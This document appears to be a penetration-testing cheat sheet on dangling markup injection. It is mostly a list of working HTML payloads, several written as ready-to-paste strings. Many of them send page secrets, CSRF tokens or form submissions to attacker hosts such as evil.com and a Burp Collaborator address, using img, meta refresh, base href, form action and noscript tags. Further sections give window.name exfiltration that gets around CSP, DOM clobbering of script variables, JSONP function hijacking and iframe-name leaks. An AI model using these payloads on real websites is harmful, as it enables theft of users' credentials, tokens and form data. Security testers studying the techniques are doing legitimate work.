Dangling Markup

Stealing clear text secrets

Code until the next occurrence of a specific character, after the injected payload is sent to the attacker server http://evil.com

Payload	Purpose	Next character	# Injection points
<img src='http://evil.com/log.cgi?	Exfiltrate code (e.g. secrets)	'	1
<meta http-equiv="refresh" content="4; URL='http://evil.com/log.cgi?	Exfiltrate code (e.g. secrets)	'	1
<style>@import//hackvertor.co.uk?	Exfiltrate code (e.g. secrets)	;	1
<table background='//your-collaborator-id.burpcollaborator.net?'	Exfiltrate code (e.g. secrets)	'	1
<base target=' ... page content ... '><base href="https://evil.com/">	Exfiltrate code (e.g. secrets)	'	2
<base href="https://evil.com/">	Exfiltrate code (e.g. secrets)	'	2
<portal src='https://attacker-server?	Exfiltrate code (portal tag needs to be enabled in chrome://flags/#enable-portals)	'	1

Form data exfiltration

Payload 1

Send form data (e.g. <form action='update_profile.php'> ) to the malicious domain <base href='http://evil.com/'>

Payload 2

Original page:

<form method="POST">
  INJECTION POINT
  <input name="email">
  USER_INPUT
  <button>Submit</button>
</form>

• Inject <form action='http://evil.com/log_steal'>. Nested <form> tags are invalid and the browser will implicitly close the first one, leaving the attacker access to the post data

<form method="POST"></form>
<form action="https://evil.com/log_steal">
  <input name="email">
  <button>Submit</button>
</form>

Payload 3

Original page:

<form method="POST">
  <input name="email">
  USER_INPUT
  <button ... INJECTION_POINT ... type=submit>Submit</button>
</form>

Change the URL where the information of the form is going to be sent with the attribute formaction:

formaction='https://evil.com'

Payload 4

Original page:

INJECTION_POINT USER_INPUT Submit

Payload:

<input type='hidden' name='review_body' value="

Similar payload:

<form action=http://google.com><input type="submit">Click Me</input><select name=xss><option

Payload 5

Original page:

INJECTION_POINT
<form action="/change_settings.php">
...
<input type="text" name="invite_user" value="">
...
<input type="hidden" name="xsrf_token" value="12345">
...
</form>

Payload:

<form action='https://inection.com/injection.php'>
<input type='hidden' name='invite_user' 
  value='aaaaa'>

The second form is ignored.

noscript exfiltration

<noscript></noscript> Is a tag whose content will be interpreted if the browser doesn't support javascript.

Payload:

<noscript><form action=http://evil.com><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=""><textarea name=contents></noscript>

Bypassing CSP with user interaction

<a href=http://attacker.net/payload.html><font size=100 color=red>You must click me</font></a>
<base target='

The victim needs to click on the link that will redirect him to payload controlled by attacker.

The target attribute inside the base tag will contain HTML content until the next single quote. If the link is clicked the window.name is going to be all that HTML content, so in the attacker page there can be the following code to exfiltrate window.name and exfiltrate that data:

<script>
if(window.name) {
    new Image().src='//your-collaborator-id.burpcollaborator.net?'+encodeURIComponent(window.name);
</script>

Misleading scripts

HTML namespace attack

Insert a new tag with and id inside the HTML that will overwrite the next one and with a value that will affect the flow of a script

<input type='hidden' id='share_with' value='fredmbogo'>     ← Injected markup
...
Share this status update with:                              ← Legitimate optional element of a dialog
<input id='share_with' value=''>

...
<script>
    ...
    function submit_status_update() {
    ...
    request.share_with = document.getElementById('share_with').value;
    ...
    }
</script>

Script namespace attack

Create variables inside javascript namespace by inserting HTML tags, affecting the flow of the application:

<img id='is_public'> ← Injected markup

...

<script>
    ...
    // Legitimate application code follows
    function retrieve_acls() {
    ...
    if (response.access_mode == AM_PUBLIC) ← The subsequent assignment fails in IE
        is_public = true;
    else
        is_public = false;
    }

    function submit_new_acls() {
    ...
    if (is_public) request.access_mode = AM_PUBLIC; ← Condition always evaluates to true
    ...
    }
</script>

Abuse of JSONP

If you find a JSONP interface you could be able to call an arbitrary function with arbitrary data:

<script src='/editor/sharing.js'>:              ← Legitimate script
  function set_sharing(public) {
    if (public) request.access_mode = AM_PUBLIC;
      else request.access_mode = AM_PRIVATE;
    ...
  }

<script src='/search?q=a&call=set_sharing'>:    ← Injected JSONP call
  set_sharing({ ... })

Or you can even try to execute some javascript:

<script src='/search?q=a&call=alert(1)'></script>

Iframe abuse

An iframe can be abused to leak sensitive information from a different page using the iframe name attribute because you can create an iframe that iframes itself abusing the HTML injection that makes the sensitive info appear inside the iframe name attribute. Then access that name from the initial iframe and leak it.

<script>
    function cspBypass(win) {
        win[0].location = 'about:blank';
        setTimeout(()=>alert(win[0].name), 500); 
    }
</script>

<iframe src="//subdomain1.portswigger-labs.net/bypassing-csp-with-dangling-iframes/target.php?email=%22><iframe name=%27" onload="cspBypass(this.contentWindow)"></iframe>

meta abuse

• Set a Cookie:

<meta http-equiv="Set-Cookie" Content="SESSID=1">

• Redirect (in 5s in this case):

<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />

This can be avoided with a CSP regarding http-equiv ( Content-Security-Policy: default-src 'self';, or Content-Security-Policy: http-equiv 'self';)